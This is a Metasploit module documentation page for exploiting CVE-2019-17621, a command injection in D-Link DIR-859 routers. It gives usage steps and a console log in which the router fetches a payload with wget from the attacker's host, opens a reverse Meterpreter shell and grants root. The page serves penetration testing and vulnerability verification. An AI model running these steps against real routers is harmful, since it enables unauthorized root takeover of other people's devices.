adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
dca17a8922dfeef83bd6b7b9a8104724a12e7c34
metasploit-gs/documentation/modules/exploit/linux/upnp/dlink_dir859_subscribe_exec.md
T
secenv 09801b2507 Add router module/firmware version tested 
... under Scenarios, as suggested by @space-r7
2020-01-17 20:57:44 -03:00

1.5 KiB
Raw Blame History

Introduction

This module exploits CVE.2019-17621, a remote unauthenticated OS command injection in the UPnP API of the DIR-859 and other D-link SOHO routers via the service argument to the gena.cgi URL.

Vulnerable Application

Get a D-Link DIR-859 router (or any of the devices/firmware versions mentioned here), or download firmware versions 1.06 or 1.05 and run them on firmadyne or similar emulation frameworks.

Verification Steps

  1. Set up router/emulated device
  2. Start msfconsole
  3. Do: use exploit/linux/upnp/dlink_dir859_subscribe_exec
  4. Do: set RHOSTS <router_ip>
  5. Do: set LHOST <local_ip>
  6. Do: run
  7. You should get a session as root.

Scenarios

D-link DIR-859 Firmware 1.05

msf5 exploit(linux/http/dlink_dir859_exec_telnet) > run 

[*] Started reverse TCP handler on 192.168.0.2:4444 
[*] Using URL: http://192.168.0.2:8080/r2hOQycyVvN2BP
[*] Client 192.168.0.1 (Wget) requested /r2hOQycyVvN2BP
[*] Sending payload to 192.168.0.1 (Wget)
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Meterpreter session 7 opened (192.168.0.2:4444 -> 192.168.0.1:54599) at 2020-01-10 11:36:52 -0300
[*] Server stopped.

meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo 
Computer     : 192.168.0.1
OS           :  (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter >
Reference in New Issue View Git Blame Copy Permalink